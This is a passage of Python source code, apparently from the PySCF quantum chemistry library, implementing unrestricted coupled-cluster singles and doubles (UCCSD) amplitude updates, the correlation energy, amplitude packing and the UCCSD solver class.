for p0,p1 in lib.prange(0, noccb, blksize):
OVvv = eris.get_OVvv(slice(p0,p1)) # OVvv = eris.OVvv[p0:p1]
Fvva += np.einsum('MF,MFae->ae', t1b[p0:p1], OVvv)
wOvVo[p0:p1] = lib.einsum('jf,MEbf->MbEj', t1a, OVvv)
wOvvO[p0:p1] = lib.einsum('JF,MFbe->MbeJ',-t1b, OVvv)
u1a += lib.einsum('iMfE,MEaf->ia', t2ab[:,p0:p1], OVvv)
u2ab[:,p0:p1] += lib.einsum('ie,MBea->iMaB', t1a, OVvv.conj())
tmp1abba = lib.einsum('iJeF,MFbe->iJbM', tauab, OVvv)
u2ab -= lib.einsum('iJbM,MA->iJbA', tmp1abba, t1b[p0:p1])
OVvv = tmp1abba = None
eris_ovov = np.asarray(eris.ovov)
eris_ovoo = np.asarray(eris.ovoo)
Woooo = lib.einsum('je,nemi->mnij', t1a, eris_ovoo)
Woooo = Woooo - Woooo.transpose(0,1,3,2)
Woooo += np.asarray(eris.oooo).transpose(0,2,1,3)
Woooo += lib.einsum('ijef,menf->mnij', tauaa, eris_ovov) * .5
u2aa += lib.einsum('mnab,mnij->ijab', tauaa, Woooo*.5)
Woooo = tauaa = None
ovoo = eris_ovoo - eris_ovoo.transpose(2,1,0,3)
Fooa += np.einsum('ne,nemi->mi', t1a, ovoo)
u1a += 0.5*lib.einsum('mnae,meni->ia', t2aa, ovoo)
wovvo += lib.einsum('nb,nemj->mbej', t1a, ovoo)
ovoo = eris_ovoo = None
tilaa = make_tau_aa(t2[0], t1a, t1a, fac=0.5)
ovov = eris_ovov - eris_ovov.transpose(0,3,2,1)
Fvva -= .5 * lib.einsum('mnaf,menf->ae', tilaa, ovov)
Fooa += .5 * lib.einsum('inef,menf->mi', tilaa, ovov)
Fova = np.einsum('nf,menf->me',t1a, ovov)
u2aa += ovov.conj().transpose(0,2,1,3) * .5
wovvo -= 0.5*lib.einsum('jnfb,menf->mbej', t2aa, ovov)
woVvO += 0.5*lib.einsum('nJfB,menf->mBeJ', t2ab, ovov)
tmpaa = lib.einsum('jf,menf->mnej', t1a, ovov)
wovvo -= lib.einsum('nb,mnej->mbej', t1a, tmpaa)
eirs_ovov = ovov = tmpaa = tilaa = None
eris_OVOV = np.asarray(eris.OVOV)
eris_OVOO = np.asarray(eris.OVOO)
WOOOO = lib.einsum('je,nemi->mnij', t1b, eris_OVOO)
WOOOO = WOOOO - WOOOO.transpose(0,1,3,2)
WOOOO += np.asarray(eris.OOOO).transpose(0,2,1,3)
WOOOO += lib.einsum('ijef,menf->mnij', taubb, eris_OVOV) * .5
u2bb += lib.einsum('mnab,mnij->ijab', taubb, WOOOO*.5)
WOOOO = taubb = None
OVOO = eris_OVOO - eris_OVOO.transpose(2,1,0,3)
Foob += np.einsum('ne,nemi->mi', t1b, OVOO)
u1b += 0.5*lib.einsum('mnae,meni->ia', t2bb, OVOO)
wOVVO += lib.einsum('nb,nemj->mbej', t1b, OVOO)
OVOO = eris_OVOO = None
tilbb = make_tau_aa(t2[2], t1b, t1b, fac=0.5)
OVOV = eris_OVOV - eris_OVOV.transpose(0,3,2,1)
Fvvb -= .5 * lib.einsum('MNAF,MENF->AE', tilbb, OVOV)
Foob += .5 * lib.einsum('inef,menf->mi', tilbb, OVOV)
Fovb = np.einsum('nf,menf->me',t1b, OVOV)
u2bb += OVOV.conj().transpose(0,2,1,3) * .5
wOVVO -= 0.5*lib.einsum('jnfb,menf->mbej', t2bb, OVOV)
wOvVo += 0.5*lib.einsum('jNbF,MENF->MbEj', t2ab, OVOV)
tmpbb = lib.einsum('jf,menf->mnej', t1b, OVOV)
wOVVO -= lib.einsum('nb,mnej->mbej', t1b, tmpbb)
eris_OVOV = OVOV = tmpbb = tilbb = None
eris_OVoo = np.asarray(eris.OVoo)
eris_ovOO = np.asarray(eris.ovOO)
Fooa += np.einsum('NE,NEmi->mi', t1b, eris_OVoo)
u1a -= lib.einsum('nMaE,MEni->ia', t2ab, eris_OVoo)
wOvVo -= lib.einsum('nb,MEnj->MbEj', t1a, eris_OVoo)
woVVo += lib.einsum('NB,NEmj->mBEj', t1b, eris_OVoo)
Foob += np.einsum('ne,neMI->MI', t1a, eris_ovOO)
u1b -= lib.einsum('mNeA,meNI->IA', t2ab, eris_ovOO)
woVvO -= lib.einsum('NB,meNJ->mBeJ', t1b, eris_ovOO)
wOvvO += lib.einsum('nb,neMJ->MbeJ', t1a, eris_ovOO)
WoOoO = lib.einsum('JE,NEmi->mNiJ', t1b, eris_OVoo)
WoOoO+= lib.einsum('je,neMI->nMjI', t1a, eris_ovOO)
WoOoO += np.asarray(eris.ooOO).transpose(0,2,1,3)
eris_OVoo = eris_ovOO = None
eris_ovOV = np.asarray(eris.ovOV)
WoOoO += lib.einsum('iJeF,meNF->mNiJ', tauab, eris_ovOV)
u2ab += lib.einsum('mNaB,mNiJ->iJaB', tauab, WoOoO)
WoOoO = None
tilab = make_tau_ab(t2[1], t1 , t1 , fac=0.5)
Fvva -= lib.einsum('mNaF,meNF->ae', tilab, eris_ovOV)
Fvvb -= lib.einsum('nMfA,nfME->AE', tilab, eris_ovOV)
Fooa += lib.einsum('iNeF,meNF->mi', tilab, eris_ovOV)
Foob += lib.einsum('nIfE,nfME->MI', tilab, eris_ovOV)
Fova += np.einsum('NF,meNF->me',t1b, eris_ovOV)
Fovb += np.einsum('nf,nfME->ME',t1a, eris_ovOV)
u2ab += eris_ovOV.conj().transpose(0,2,1,3)
wovvo += 0.5*lib.einsum('jNbF,meNF->mbej', t2ab, eris_ovOV)
wOVVO += 0.5*lib.einsum('nJfB,nfME->MBEJ', t2ab, eris_ovOV)
wOvVo -= 0.5*lib.einsum('jnfb,nfME->MbEj', t2aa, eris_ovOV)
woVvO -= 0.5*lib.einsum('JNFB,meNF->mBeJ', t2bb, eris_ovOV)
woVVo += 0.5*lib.einsum('jNfB,mfNE->mBEj', t2ab, eris_ovOV)
wOvvO += 0.5*lib.einsum('nJbF,neMF->MbeJ', t2ab, eris_ovOV)
tmpabab = lib.einsum('JF,meNF->mNeJ', t1b, eris_ovOV)
tmpbaba = lib.einsum('jf,nfME->MnEj', t1a, eris_ovOV)
woVvO -= lib.einsum('NB,mNeJ->mBeJ', t1b, tmpabab)
wOvVo -= lib.einsum('nb,MnEj->MbEj', t1a, tmpbaba)
woVVo += lib.einsum('NB,NmEj->mBEj', t1b, tmpbaba)
wOvvO += lib.einsum('nb,nMeJ->MbeJ', t1a, tmpabab)
tmpabab = tmpbaba = tilab = None
Fova += fova
Fovb += fovb
u1a += fova.conj()
u1a += np.einsum('ie,ae->ia', t1a, Fvva)
u1a -= np.einsum('ma,mi->ia', t1a, Fooa)
u1a -= np.einsum('imea,me->ia', t2aa, Fova)
u1a += np.einsum('iMaE,ME->ia', t2ab, Fovb)
u1b += fovb.conj()
u1b += np.einsum('ie,ae->ia',t1b,Fvvb)
u1b -= np.einsum('ma,mi->ia',t1b,Foob)
u1b -= np.einsum('imea,me->ia', t2bb, Fovb)
u1b += np.einsum('mIeA,me->IA', t2ab, Fova)
eris_oovv = np.asarray(eris.oovv)
eris_ovvo = np.asarray(eris.ovvo)
wovvo -= eris_oovv.transpose(0,2,3,1)
wovvo += eris_ovvo.transpose(0,2,1,3)
oovv = eris_oovv - eris_ovvo.transpose(0,3,2,1)
u1a-= np.einsum('nf,niaf->ia', t1a, oovv)
tmp1aa = lib.einsum('ie,mjbe->mbij', t1a, oovv)
u2aa += 2*lib.einsum('ma,mbij->ijab', t1a, tmp1aa)
eris_ovvo = eris_oovv = oovv = tmp1aa = None
eris_OOVV = np.asarray(eris.OOVV)
eris_OVVO = np.asarray(eris.OVVO)
wOVVO -= eris_OOVV.transpose(0,2,3,1)
wOVVO += eris_OVVO.transpose(0,2,1,3)
OOVV = eris_OOVV - eris_OVVO.transpose(0,3,2,1)
u1b-= np.einsum('nf,niaf->ia', t1b, OOVV)
tmp1bb = lib.einsum('ie,mjbe->mbij', t1b, OOVV)
u2bb += 2*lib.einsum('ma,mbij->ijab', t1b, tmp1bb)
eris_OVVO = eris_OOVV = OOVV = None
eris_ooVV = np.asarray(eris.ooVV)
eris_ovVO = np.asarray(eris.ovVO)
woVVo -= eris_ooVV.transpose(0,2,3,1)
woVvO += eris_ovVO.transpose(0,2,1,3)
u1b+= np.einsum('nf,nfAI->IA', t1a, eris_ovVO)
tmp1ab = lib.einsum('ie,meBJ->mBiJ', t1a, eris_ovVO)
tmp1ab+= lib.einsum('IE,mjBE->mBjI', t1b, eris_ooVV)
u2ab -= lib.einsum('ma,mBiJ->iJaB', t1a, tmp1ab)
eris_ooVV = eris_ovVo = tmp1ab = None
eris_OOvv = np.asarray(eris.OOvv)
eris_OVvo = np.asarray(eris.OVvo)
wOvvO -= eris_OOvv.transpose(0,2,3,1)
wOvVo += eris_OVvo.transpose(0,2,1,3)
u1a+= np.einsum('NF,NFai->ia', t1b, eris_OVvo)
tmp1ba = lib.einsum('IE,MEbj->MbIj', t1b, eris_OVvo)
tmp1ba+= lib.einsum('ie,MJbe->MbJi', t1a, eris_OOvv)
u2ab -= lib.einsum('MA,MbIj->jIbA', t1b, tmp1ba)
eris_OOvv = eris_OVvO = tmp1ba = None
u2aa += 2*lib.einsum('imae,mbej->ijab', t2aa, wovvo)
u2aa += 2*lib.einsum('iMaE,MbEj->ijab', t2ab, wOvVo)
u2bb += 2*lib.einsum('imae,mbej->ijab', t2bb, wOVVO)
u2bb += 2*lib.einsum('mIeA,mBeJ->IJAB', t2ab, woVvO)
u2ab += lib.einsum('imae,mBeJ->iJaB', t2aa, woVvO)
u2ab += lib.einsum('iMaE,MBEJ->iJaB', t2ab, wOVVO)
u2ab += lib.einsum('iMeA,MbeJ->iJbA', t2ab, wOvvO)
u2ab += lib.einsum('IMAE,MbEj->jIbA', t2bb, wOvVo)
u2ab += lib.einsum('mIeA,mbej->jIbA', t2ab, wovvo)
u2ab += lib.einsum('mIaE,mBEj->jIaB', t2ab, woVVo)
wovvo = wOVVO = woVvO = wOvVo = woVVo = wOvvO = None
Ftmpa = Fvva - .5*lib.einsum('mb,me->be', t1a, Fova)
Ftmpb = Fvvb - .5*lib.einsum('mb,me->be', t1b, Fovb)
u2aa += lib.einsum('ijae,be->ijab', t2aa, Ftmpa)
u2bb += lib.einsum('ijae,be->ijab', t2bb, Ftmpb)
u2ab += lib.einsum('iJaE,BE->iJaB', t2ab, Ftmpb)
u2ab += lib.einsum('iJeA,be->iJbA', t2ab, Ftmpa)
Ftmpa = Fooa + 0.5*lib.einsum('je,me->mj', t1a, Fova)
Ftmpb = Foob + 0.5*lib.einsum('je,me->mj', t1b, Fovb)
u2aa -= lib.einsum('imab,mj->ijab', t2aa, Ftmpa)
u2bb -= lib.einsum('imab,mj->ijab', t2bb, Ftmpb)
u2ab -= lib.einsum('iMaB,MJ->iJaB', t2ab, Ftmpb)
u2ab -= lib.einsum('mIaB,mj->jIaB', t2ab, Ftmpa)
eris_ovoo = np.asarray(eris.ovoo).conj()
eris_OVOO = np.asarray(eris.OVOO).conj()
eris_OVoo = np.asarray(eris.OVoo).conj()
eris_ovOO = np.asarray(eris.ovOO).conj()
ovoo = eris_ovoo - eris_ovoo.transpose(2,1,0,3)
OVOO = eris_OVOO - eris_OVOO.transpose(2,1,0,3)
u2aa -= lib.einsum('ma,jbim->ijab', t1a, ovoo)
u2bb -= lib.einsum('ma,jbim->ijab', t1b, OVOO)
u2ab -= lib.einsum('ma,JBim->iJaB', t1a, eris_OVoo)
u2ab -= lib.einsum('MA,ibJM->iJbA', t1b, eris_ovOO)
eris_ovoo = eris_OVoo = eris_OVOO = eris_ovOO = None
u2aa *= .5
u2bb *= .5
u2aa = u2aa - u2aa.transpose(0,1,3,2)
u2aa = u2aa - u2aa.transpose(1,0,2,3)
u2bb = u2bb - u2bb.transpose(0,1,3,2)
u2bb = u2bb - u2bb.transpose(1,0,2,3)
eia_a = lib.direct_sum('i-a->ia', mo_ea_o, mo_ea_v)
eia_b = lib.direct_sum('i-a->ia', mo_eb_o, mo_eb_v)
u1a /= eia_a
u1b /= eia_b
u2aa /= lib.direct_sum('ia+jb->ijab', eia_a, eia_a)
u2ab /= lib.direct_sum('ia+jb->ijab', eia_a, eia_b)
u2bb /= lib.direct_sum('ia+jb->ijab', eia_b, eia_b)
time0 = log.timer_debug1('update t1 t2', *time0)
t1new = u1a, u1b
t2new = u2aa, u2ab, u2bb
return t1new, t2new
def energy(cc, t1=None, t2=None, eris=None):
'''UCCSD correlation energy'''
if t1 is None: t1 = cc.t1
if t2 is None: t2 = cc.t2
if eris is None: eris = cc.ao2mo()
t1a, t1b = t1
t2aa, t2ab, t2bb = t2
nocca, noccb, nvira, nvirb = t2ab.shape
eris_ovov = np.asarray(eris.ovov)
eris_OVOV = np.asarray(eris.OVOV)
eris_ovOV = np.asarray(eris.ovOV)
fova = eris.focka[:nocca,nocca:]
fovb = eris.fockb[:noccb,noccb:]
e = np.einsum('ia,ia', fova, t1a)
e += np.einsum('ia,ia', fovb, t1b)
e += 0.25*np.einsum('ijab,iajb',t2aa,eris_ovov)
e -= 0.25*np.einsum('ijab,ibja',t2aa,eris_ovov)
e += 0.25*np.einsum('ijab,iajb',t2bb,eris_OVOV)
e -= 0.25*np.einsum('ijab,ibja',t2bb,eris_OVOV)
e += np.einsum('iJaB,iaJB',t2ab,eris_ovOV)
e += 0.5*np.einsum('ia,jb,iajb',t1a,t1a,eris_ovov)
e -= 0.5*np.einsum('ia,jb,ibja',t1a,t1a,eris_ovov)
e += 0.5*np.einsum('ia,jb,iajb',t1b,t1b,eris_OVOV)
e -= 0.5*np.einsum('ia,jb,ibja',t1b,t1b,eris_OVOV)
e += np.einsum('ia,jb,iajb',t1a,t1b,eris_ovOV)
if abs(e.imag) > 1e-4:
logger.warn(cc, 'Non-zero imaginary part found in UCCSD energy %s', e)
return e.real
get_nocc = ump2.get_nocc
get_nmo = ump2.get_nmo
get_frozen_mask = ump2.get_frozen_mask
def amplitudes_to_vector(t1, t2, out=None):
nocca, nvira = t1[0].shape
noccb, nvirb = t1[1].shape
sizea = nocca * nvira + nocca*(nocca-1)//2*nvira*(nvira-1)//2
sizeb = noccb * nvirb + noccb*(noccb-1)//2*nvirb*(nvirb-1)//2
sizeab = nocca * noccb * nvira * nvirb
vector = np.ndarray(sizea+sizeb+sizeab, t2[0].dtype, buffer=out)
ccsd.amplitudes_to_vector_s4(t1[0], t2[0], out=vector[:sizea])
ccsd.amplitudes_to_vector_s4(t1[1], t2[2], out=vector[sizea:])
vector[sizea+sizeb:] = t2[1].ravel()
return vector
def vector_to_amplitudes(vector, nmo, nocc):
nocca, noccb = nocc
nmoa, nmob = nmo
nvira, nvirb = nmoa-nocca, nmob-noccb
nocc = nocca + noccb
nvir = nvira + nvirb
nov = nocc * nvir
size = nov + nocc*(nocc-1)//2*nvir*(nvir-1)//2
if vector.size == size:
#return ccsd.vector_to_amplitudes_s4(vector, nmo, nocc)
raise RuntimeError('Input vector is GCCSD vecotr')
else:
sizea = nocca * nvira + nocca*(nocca-1)//2*nvira*(nvira-1)//2
sizeb = noccb * nvirb + noccb*(noccb-1)//2*nvirb*(nvirb-1)//2
sections = np.cumsum([sizea, sizeb])
veca, vecb, t2ab = np.split(vector, sections)
t1a, t2aa = ccsd.vector_to_amplitudes_s4(veca, nmoa, nocca)
t1b, t2bb = ccsd.vector_to_amplitudes_s4(vecb, nmob, noccb)
t2ab = t2ab.copy().reshape(nocca,noccb,nvira,nvirb)
return (t1a,t1b), (t2aa,t2ab,t2bb)
def amplitudes_from_rccsd(t1, t2):
t2aa = t2 - t2.transpose(0,1,3,2)
return (t1,t1), (t2aa,t2,t2aa)
def _add_vvVV(mycc, t1, t2ab, eris, out=None):
'''Ht2 = np.einsum('iJcD,acBD->iJaB', t2ab, vvVV)
without using symmetry in t2ab or Ht2
'''
time0 = time.clock(), time.time()
if t2ab.size == 0:
return np.zeros_like(t2ab)
if t1 is not None:
t2ab = make_tau_ab(t2ab, t1, t1)
log = logger.Logger(mycc.stdout, mycc.verbose)
nocca, noccb, nvira, nvirb = t2ab.shape
if mycc.direct: # AO direct CCSD
if getattr(eris, 'mo_coeff', None) is not None:
mo_a, mo_b = eris.mo_coeff
else:
moidxa, moidxb = mycc.get_frozen_mask()
mo_a = mycc.mo_coeff[0][:,moidxa]
mo_b = mycc.mo_coeff[1][:,moidxb]
# Note tensor t2ab may be t2bbab from eom_uccsd code. In that
# particular case, nocca, noccb do not equal to the actual number of
# alpha/beta occupied orbitals. orbva and orbvb cannot be indexed as
# mo_a[:,nocca:] and mo_b[:,noccb:]
orbva = mo_a[:,-nvira:]
orbvb = mo_b[:,-nvirb:]
tau = lib.einsum('ijab,pa->ijpb', t2ab, orbva)
tau = lib.einsum('ijab,pb->ijap', tau, orbvb)
time0 = logger.timer_debug1(mycc, 'vvvv-tau mo2ao', *time0)
buf = eris._contract_vvVV_t2(mycc, tau, mycc.direct, out, log)
mo = np.asarray(np.hstack((orbva, orbvb)), order='F')
Ht2 = _ao2mo.nr_e2(buf.reshape(nocca*noccb,-1), mo.conj(),
(0,nvira,nvira,nvira+nvirb), 's1', 's1')
return Ht2.reshape(t2ab.shape)
else:
return eris._contract_vvVV_t2(mycc, t2ab, mycc.direct, out, log)
def _add_vvvv(mycc, t1, t2, eris, out=None, with_ovvv=False, t2sym=None):
time0 = time.clock(), time.time()
log = logger.Logger(mycc.stdout, mycc.verbose)
if t1 is None:
t2aa, t2ab, t2bb = t2
else:
t2aa, t2ab, t2bb = make_tau(t2, t1, t1)
nocca, nvira = t2aa.shape[1:3]
noccb, nvirb = t2bb.shape[1:3]
if mycc.direct:
assert(t2sym is None)
if with_ovvv:
raise NotImplementedError
if getattr(eris, 'mo_coeff', None) is not None:
mo_a, mo_b = eris.mo_coeff
else:
moidxa, moidxb = mycc.get_frozen_mask()
mo_a = mycc.mo_coeff[0][:,moidxa]
mo_b = mycc.mo_coeff[1][:,moidxb]
nao = mo_a.shape[0]
otrila = np.tril_indices(nocca,-1)
otrilb = np.tril_indices(noccb,-1)
if nocca > 1:
tauaa = lib.einsum('xab,pa->xpb', t2aa[otrila], mo_a[:,nocca:])
tauaa = lib.einsum('xab,pb->xap', tauaa, mo_a[:,nocca:])
else:
tauaa = np.zeros((0,nao,nao))
if noccb > 1:
taubb = lib.einsum('xab,pa->xpb', t2bb[otrilb], mo_b[:,noccb:])
taubb = lib.einsum('xab,pb->xap', taubb, mo_b[:,noccb:])
else:
taubb = np.zeros((0,nao,nao))
tauab = lib.einsum('ijab,pa->ijpb', t2ab, mo_a[:,nocca:])
tauab = lib.einsum('ijab,pb->ijap', tauab, mo_b[:,noccb:])
tau = np.vstack((tauaa, taubb, tauab.reshape(nocca*noccb,nao,nao)))
tauaa = taubb = tauab = None
time0 = log.timer_debug1('vvvv-tau', *time0)
buf = ccsd._contract_vvvv_t2(mycc, mycc.mol, None, tau, out, log)
mo = np.asarray(np.hstack((mo_a[:,nocca:], mo_b[:,noccb:])), order='F')
u2aa = np.zeros_like(t2aa)
if nocca > 1:
u2tril = buf[:otrila[0].size]
u2tril = _ao2mo.nr_e2(u2tril.reshape(-1,nao**2), mo.conj(),
(0,nvira,0,nvira), 's1', 's1')
u2tril = u2tril.reshape(otrila[0].size,nvira,nvira)
u2aa[otrila[1],otrila[0]] = u2tril.transpose(0,2,1)
u2aa[otrila] = u2tril
u2bb = np.zeros_like(t2bb)
if noccb > 1:
u2tril = buf[otrila[0].size:otrila[0].size+otrilb[0].size]
u2tril = _ao2mo.nr_e2(u2tril.reshape(-1,nao**2), mo.conj(),
(nvira,nvira+nvirb,nvira,nvira+nvirb), 's1', 's1')
u2tril = u2tril.reshape(otrilb[0].size,nvirb,nvirb)
u2bb[otrilb[1],otrilb[0]] = u2tril.transpose(0,2,1)
u2bb[otrilb] = u2tril
u2ab = _ao2mo.nr_e2(buf[-nocca*noccb:].reshape(nocca*noccb,nao**2), mo,
(0,nvira,nvira,nvira+nvirb), 's1', 's1')
u2ab = u2ab.reshape(t2ab.shape)
else:
assert(not with_ovvv)
if t2sym is None:
tmp = eris._contract_vvvv_t2(mycc, t2aa[np.tril_indices(nocca)],
mycc.direct, None)
u2aa = ccsd._unpack_t2_tril(tmp, nocca, nvira, None, 'jiba')
tmp = eris._contract_VVVV_t2(mycc, t2bb[np.tril_indices(noccb)],
mycc.direct, None)
u2bb = ccsd._unpack_t2_tril(tmp, noccb, nvirb, None, 'jiba')
u2ab = eris._contract_vvVV_t2(mycc, t2ab, mycc.direct, None)
else:
u2aa = eris._contract_vvvv_t2(mycc, t2aa, mycc.direct, None)
u2bb = eris._contract_VVVV_t2(mycc, t2bb, mycc.direct, None)
u2ab = eris._contract_vvVV_t2(mycc, t2ab, mycc.direct, None)
return u2aa,u2ab,u2bb
class UCCSD(ccsd.CCSD):
conv_tol = getattr(__config__, 'cc_uccsd_UCCSD_conv_tol', 1e-7)
conv_tol_normt = getattr(__config__, 'cc_uccsd_UCCSD_conv_tol_normt', 1e-6)
# Attribute frozen can be
# * An integer : The same number of inner-most alpha and beta orbitals are frozen
# * One list : Same alpha and beta orbital indices to be frozen
# * A pair of list : First list is the orbital indices to be frozen for alpha
# orbitals, second list is for beta orbitals
def __init__(self, mf, frozen=0, mo_coeff=None, mo_occ=None):
assert isinstance(mf, scf.uhf.UHF)
ccsd.CCSD.__init__(self, mf, frozen, mo_coeff, mo_occ)
get_nocc = get_nocc
get_nmo = get_nmo
get_frozen_mask = get_frozen_mask
def init_amps(self, eris=None):
time0 = time.clock(), time.time()
if eris is None:
eris = self.ao2mo(self.mo_coeff)
nocca, noccb = self.nocc
fova = eris.focka[:nocca,nocca:]
fovb = eris.fockb[:noccb,noccb:]
mo_ea_o = eris.mo_energy[0][:nocca]
mo_ea_v = eris.mo_energy[0][nocca:]
mo_eb_o = eris.mo_energy[1][:noccb]
mo_eb_v = eris.mo_energy[1][noccb:]
eia_a = lib.direct_sum('i-a->ia', mo_ea_o, mo_ea_v)
eia_b = lib.direct_sum('i-a->ia', mo_eb_o, mo_eb_v)
t1a = fova.conj() / eia_a
t1b = fovb.conj() / eia_b
eris_ovov = np.asarray(eris.ovov)
eris_OVOV = np.asarray(eris.OVOV)
eris_ovOV = np.asarray(eris.ovOV)
t2aa = eris_ovov.transpose(0,2,1,3) / lib.direct_sum('ia+jb->ijab', eia_a, eia_a)
t2ab = eris_ovOV.transpose(0,2,1,3) / lib.direct_sum('ia+jb->ijab', eia_a, eia_b)
t2bb = eris_OVOV.transpose(0,2,1,3) / lib.direct_sum('ia+jb->ijab', eia_b, eia_b)
t2aa = t2aa - t2aa.transpose(0,1,3,2)
t2bb = t2bb - t2bb.transpose(0,1,3,2)
e = np.einsum('iJaB,iaJB', t2ab, eris_ovOV)
e += 0.25*np.einsum('ijab,iajb', t2aa, eris_ovov)
e -= 0.25*np.einsum('ijab,ibja', t2aa, eris_ovov)
e += 0.25*np.einsum('ijab,iajb', t2bb, eris_OVOV)
e -= 0.25*np.einsum('ijab,ibja', t2bb, eris_OVOV)
self.emp2 = e.real
logger.info(self, 'Init t2, MP2 energy = %.15g', self.emp2)
logger.timer(self, 'init mp2', *time0)
return self.emp2, (t1a,t1b), (t2aa,t2ab,t2bb)
energy = energy
update_amps = update_amps
_add_vvvv = _add_vvvv
_add_vvVV = _add_vvVV
def kernel(self, t1=None, t2=None, eris=None, mbpt2=False):
return self.ccsd(t1, t2, eris, mbpt2)
def ccsd(self, t1=None, t2=None, eris=None, mbpt2=False):
'''Ground-state unrestricted (U)CCSD.
Kwargs:
mbpt2 : bool
Use one-shot MBPT2 approximation to CCSD.
'''
if mbpt2:
pt = ump2.UMP2(self._scf, self.frozen, self.mo_coeff, self.mo_occ)
self.e_corr, self.t2 = pt.kernel(eris=eris)
t2ab = self.t2[1]
nocca, noccb, nvira, nvirb = t2ab.shape
self.t1 = (np.zeros((nocca,nvira)), np.zeros((noccb,nvirb)))
return self.e_corr, self.t1, self.t2
return ccsd.CCSD.ccsd(self, t1, t2, eris)
def solve_lambda(self, t1=None, t2=None, l1=None, l2=None,
eris=None):
from pyscf.cc import uccsd_lambda
if t1 is None: t1 = self.t1
if t2 is None: t2 = self.t2
if eris is None: eris = self.ao2mo(self.mo_coeff)
self.converged_lambda, self.l1, self.l2 = \
uccsd_lambda.kernel(self, eris, t1, t2, l1, l2,
max_cycle=self.max_cycle,
tol=self.conv_tol_normt,
verbose=self.verbose)
return self.l1, self.l2
def ccsd_t(self, t1=None, t2=None, eris=None):
from pyscf.cc import uccsd_t
if t1 is None: t1 = self.t1
if t2 is None: t2 = self.t2
if eris is None: eris = self.ao2mo(self.mo_coeff)
return uccsd_t.kernel(self, eris, t1, t2, self.verbose)
uccsd_t = ccsd_t
def make_rdm1(self, t1=None, t2=None, l1=None, l2=None, ao_repr=False):
'''Un-relaxed 1-particle density matrix in MO space
Returns:
dm1a, dm1b
'''
from pyscf.cc import uccsd_rdm
if t1 is None: t1 = self.t1
if t2 is None: t2 = self.t2
if l1 is None: l1 = self.l1
if l2 is None: l2 = self.l2
if l1 is None: l1, l2 = self.solve_lambda(t1, t2)
return uccsd_rdm.make_rdm1(self, t1, t2, l1, l2, ao_repr=ao_repr)
def make_rdm2(self, t1=None, t2=None, l1=None, l2=None, ao_repr=False):
'''2-particle density matrix in spin-oribital basis.
'''
from pyscf.cc import uccsd_rdm
if t1 is None: t1 = self.t1
if t2 is None: t2 = self.t2
if l1 is None: l1 = self.l1
if l2 is None: l2 = self.l2
if l1 is None: l1, l2 = self.solve_lambda(t1, t2)
return uccsd_rdm.make_rdm2(self, t1, t2, l1, l2, ao_repr=ao_repr)
def spin_square(self, mo_coeff=None, s=None):
from pyscf.fci.spin_op import spin_square_general
if mo_coeff is None:
mo_coeff = self.mo_coeff
if s is None:
s = self._scf.get_ovlp()
dma,dmb = self.make_rdm1()
dmaa,dmab,dmbb = self.make_rdm2()
return spin_square_general(dma,dmb,dmaa,dmab,dmbb,mo_coeff,s)
def ao2mo(self, mo_coeff=None):
nmoa, nmob = self.get_nmo()
nao = self.mo_coeff[0].shape[0]
nmo_pair = nmoa * (nmoa+1) // 2
nao_pair = nao * (nao+1) // 2
mem_incore = (max(nao_pair**2, nmoa**4) + nmo_pair**2) * 8/1e6
mem_now = lib.current_memory()[0]
if (self._scf._eri is not None and
(mem_incore+mem_now < self.max_memory or self.incore_complete)):
return _make_eris_incore(self, mo_coeff)
elif getattr(self._scf, 'with_df', None):
logger.warn(self, 'UCCSD detected DF being used in the HF object. '
'MO integrals are computed based on the DF 3-index tensors.\n'
'It\'s recommended to use dfccsd.CCSD for the '
'DF-CCSD calculations')
raise NotImplementedError
else:
return _make_eris_outcore(self, mo_coeff)
def ipccsd(self, nroots=1, left=False, koopmans=False, guess=None,
partition=None, eris=None):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMIP(self).kernel(nroots, left, koopmans, guess,
partition, eris)
def eaccsd(self, nroots=1, left=False, koopmans=False, guess=None,
partition=None, eris=None):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMEA(self).kernel(nroots, left, koopmans, guess,
partition, eris)
def eeccsd(self, nroots=1, koopmans=False, guess=None, eris=None):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMEE(self).kernel(nroots, koopmans, guess, eris)
def eomee_ccsd(self, nroots=1, koopmans=False, guess=None, eris=None):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMEESpinKeep(self).kernel(nroots, koopmans, guess, eris)
def eomsf_ccsd(self, nroots=1, koopmans=False, guess=None, eris=None):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMEESpinFlip(self).kernel(nroots, koopmans, guess, eris)
def eomip_method(self):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMIP(self)
def eomea_method(self):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMEA(self)
def eomee_method(self):
from pyscf.cc import eom_uccsd
return eom_uccsd.EOMEE(self)
def density_fit(self):
raise NotImplementedError
def nuc_grad_method(self):
from pyscf.grad import uccsd
return uccsd.Gradients(self)
def amplitudes_to_vector(self, t1, t2, out=None):
return amplitudes_to_vector(t1, t2, out)
def vector_to_amplitudes(self, vector, nmo=None, nocc=None):
if nocc is None: nocc = self.nocc
if nmo is None: nmo = self.nmo
return vector_to_amplitudes(vector, nmo, nocc)
def vector_size(self, nmo=None, nocc=None):
if nocc is None: nocc = self.nocc
if nmo is None: nmo = self.nmo
nocca, noccb = nocc
nmoa, nmob = nmo
nvira, nvirb = nmoa-nocca, nmob-noccb
sizea = nocca * nvira + nocca*(nocca-1)//2*nvira*(nvira-1)//2
sizeb = noccb * nvirb + noccb*(noccb-1)//2*nvirb*(nvirb-1)//2
sizeab = nocca * noccb * nvira * nvirb
return sizea + sizeb + sizeab
def amplitudes_from_rccsd(self, t1, t2):
return amplitudes_from_rccsd(t1, t2)
def get_t1_diagnostic(self, t1=None):
if t1 is None: t1 = self.t1
raise NotImplementedError
#return get_t1_diagnostic(t1)
def get_d1_diagnostic(self, t1=None):
if t1 is None: t1 = self.t1
raise NotImplementedError
#return get_d1_diagnostic(t1)
def get_d2_diagnostic(self, t2=None):
if t2 is None: t2 = self.t2
raise NotImplementedError
#return get_d2_diagnostic(t2)
CCSD = UCCSD
class _ChemistsERIs(ccsd._ChemistsERIs):
def __init__(self, mol=None):
ccsd._ChemistsERIs.__init__(self, mol)
self.OOOO = None
self.OVOO = None
self.OVOV = None
self.OOVV = None
self.OVVO = None
self.OVVV = None
self.VVVV = None
self.ooOO = None
self.ovOO = None
self.ovOV = None
self.ooVV = None
self.ovVO = None
self.ovVV = None
self.vvVV = None
self.OVoo = None
self.OOvv = None
self.OVvo = None
